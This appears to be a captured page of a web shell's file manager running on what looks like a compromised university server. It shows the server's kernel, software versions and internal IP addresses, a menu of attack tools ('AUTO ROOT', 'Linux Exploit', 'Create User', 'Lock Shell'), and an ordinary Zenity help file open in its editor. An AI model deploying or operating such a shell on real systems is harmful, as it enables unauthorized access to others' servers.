Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
usr /
share /
help /
en_GB /
zenity /
[ HOME SHELL ]
Name
Size
Permission
Action
figures
[ DIR ]
drwxr-xr-x
calendar.page
2.21
KB
-rw-r--r--
color-selection.page
1.38
KB
-rw-r--r--
entry.page
1.59
KB
-rw-r--r--
error.page
861
B
-rw-r--r--
file-selection.page
2.1
KB
-rw-r--r--
forms.page
2.21
KB
-rw-r--r--
index.page
821
B
-rw-r--r--
info.page
889
B
-rw-r--r--
intro.page
1.07
KB
-rw-r--r--
legal.xml
3.05
KB
-rw-r--r--
list.page
2.7
KB
-rw-r--r--
message.page
668
B
-rw-r--r--
notification.page
2.08
KB
-rw-r--r--
password.page
1.27
KB
-rw-r--r--
progress.page
2.19
KB
-rw-r--r--
question.page
882
B
-rw-r--r--
scale.page
2.02
KB
-rw-r--r--
text.page
2.19
KB
-rw-r--r--
usage.page
8.09
KB
-rw-r--r--
warning.page
891
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : info.page
<?xml version="1.0" encoding="utf-8"?> <page xmlns="http://projectmallard.org/1.0/" type="topic" id="info" xml:lang="zenity-en-GB"> <info> <link type="guide" xref="message"/> <desc>Use the <cmd>--info</cmd> option.</desc> <include xmlns="http://www.w3.org/2001/XInclude" href="legal.xml"/> </info> <title>Info Dialog</title> <p> Use the <cmd>--info</cmd> option to create an information dialog. </p> <p> The following example script shows how to create an information dialog: </p> <code> #!/bin/bash zenity --info \ --text="Merge complete. Updated 3 of 10 files." </code> <figure> <title>Information Dialogue Example</title> <desc><app>Zenity</app> information dialog example</desc> <media type="image" mime="image/png" src="figures/zenity-information-screenshot.png"/> </figure> </page>
Close